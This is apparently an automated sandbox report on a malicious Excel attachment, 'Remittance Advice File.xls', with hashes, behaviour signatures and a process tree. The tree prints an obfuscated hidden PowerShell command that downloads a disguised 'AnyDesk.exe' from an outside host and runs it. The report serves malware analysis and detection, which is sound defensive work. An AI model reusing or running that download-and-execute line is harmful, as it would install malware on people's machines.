Analysis
- max time kernel: 104s
- max time network: 90s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 13-10-2021 16:47

Static task: static1
Behavioral task: behavioral1
  Sample: Remittance Advice File.xls
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: Remittance Advice File.xls
  Resource: win10v20210408
General
- Target: Remittance Advice File.xls
- Size: 73KB
- MD5: ca027182d31698dcbb704e0d1a7c28d2
- SHA1: 628a5f48cbad45672a239e683bfc4eeadb82fbc3
- SHA256: 0e201d6a6fbac62df83faedc6af867e1b17de08220698b5f06c204ad4d936b83
- SHA512: bbb8f18e4dbd1d67881a9c91b3da6bac785bb218dc04be3bb9f7aa7a01cd3b82d4ec234d438dd3f4bcbda44624c32535ab932321d6ca1a55e9d9bef65b0b7cfc

Malware Config
- Extracted: http://thepunchlineexpose.com/Manager/AnyDesk.exe
Signatures
- Process spawned unexpected child process (1 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description: Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process
    pid: 2012 (process: cmd.exe)
    pid_target: 360 (target process: EXCEL.EXE)
- Office loads VBA resources, possible macro or embedded object present
- Enumerates system info in registry (2 TTPs, 1 IoCs)
  Processes:
    description: Key opened
    ioc: \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor
    process: EXCEL.EXE
- Modifies Internet Explorer settings
  Processes (process: EXCEL.EXE for every entry):
    Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"
    Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"
    Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt
    Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"
    Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"
    Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel
    Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar
    Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote
    Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"
- Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  Processes:
    pid 360, process EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid 2008, process powershell.exe
    pid 2008, process powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description: Token: SeDebugPrivilege; pid 2008, process powershell.exe
- Suspicious use of SetWindowsHookEx (3 IoCs)
  Processes:
    pid 360, process EXCEL.EXE
    pid 360, process EXCEL.EXE
    pid 360, process EXCEL.EXE
- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes:
    PID 360 wrote to memory of 2012 (process EXCEL.EXE, target process cmd.exe)
    PID 360 wrote to memory of 2012 (process EXCEL.EXE, target process cmd.exe)
    PID 360 wrote to memory of 2012 (process EXCEL.EXE, target process cmd.exe)
    PID 360 wrote to memory of 2012 (process EXCEL.EXE, target process cmd.exe)
    PID 2012 wrote to memory of 2008 (process cmd.exe, target process powershell.exe)
    PID 2012 wrote to memory of 2008 (process cmd.exe, target process powershell.exe)
    PID 2012 wrote to memory of 2008 (process cmd.exe, target process powershell.exe)
    PID 2012 wrote to memory of 2008 (process cmd.exe, target process powershell.exe)
Processes
- C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE (depth 1)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Remittance Advice File.xls"
  - Enumerates system info in registry
  - Modifies Internet Explorer settings
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (depth 2)
    Command line: cmd /c ""C:\Users\Public\Documents\institutionsport.cmd" "
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`p://thepunchlineexpose.com/Manager/AnyDesk.e`xe -Destination C:\Users\Public\Documents\weekshe.e`xe;C:\Users\Public\Documents\weekshe.e`xe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Public\Documents\institutionsport.cmd
  MD5: e623d1a58b6060f53e373dc8d9850c87
  SHA1: 5d7ca4d6ffb2c4c96615b72acbf54060765c861d
  SHA256: 99f121fdaf92f6bfdb6af9bf6813fd10ce95b848378b964739b1ae7e667e34e9
  SHA512: f8ae81455e3de663d89a255b46b98d3ff01c8741d73be3413163a2743ae2e00e47ec094f253f15cd8d0fa7aba04fbc31c52c7b23350435277a0507cbaa86f74b
- memory/360-60-0x000000002FD01000-0x000000002FD04000-memory.dmp (Filesize: 12KB)
- memory/360-61-0x0000000070E11000-0x0000000070E13000-memory.dmp (Filesize: 8KB)
- memory/360-62-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
- memory/360-109-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
- memory/2008-72-0x0000000004850000-0x0000000004851000-memory.dmp (Filesize: 4KB)
- memory/2008-76-0x00000000056F0000-0x00000000056F1000-memory.dmp (Filesize: 4KB)
- memory/2008-67-0x0000000001EB0000-0x0000000001EB1000-memory.dmp (Filesize: 4KB)
- memory/2008-68-0x00000000048D0000-0x00000000048D1000-memory.dmp (Filesize: 4KB)
- memory/2008-69-0x0000000004890000-0x0000000004891000-memory.dmp (Filesize: 4KB)
- memory/2008-70-0x0000000004892000-0x0000000004893000-memory.dmp (Filesize: 4KB)
- memory/2008-71-0x00000000024D0000-0x00000000024D1000-memory.dmp (Filesize: 4KB)
- memory/2008-65-0x0000000000000000-mapping.dmp
- memory/2008-75-0x000000007EF30000-0x000000007EF31000-memory.dmp (Filesize: 4KB)
- memory/2008-66-0x0000000075451000-0x0000000075453000-memory.dmp (Filesize: 8KB)
- memory/2008-81-0x0000000005640000-0x0000000005641000-memory.dmp (Filesize: 4KB)
- memory/2008-82-0x0000000006220000-0x0000000006221000-memory.dmp (Filesize: 4KB)
- memory/2008-89-0x0000000005820000-0x0000000005821000-memory.dmp (Filesize: 4KB)
- memory/2008-90-0x00000000062E0000-0x00000000062E1000-memory.dmp (Filesize: 4KB)
- memory/2008-91-0x0000000005600000-0x0000000005601000-memory.dmp (Filesize: 4KB)
- memory/2008-93-0x00000000063F0000-0x00000000063F1000-memory.dmp (Filesize: 4KB)
- memory/2008-107-0x0000000006520000-0x0000000006521000-memory.dmp (Filesize: 4KB)
- memory/2008-108-0x0000000006570000-0x0000000006571000-memory.dmp (Filesize: 4KB)
- memory/2012-63-0x0000000000000000-mapping.dmp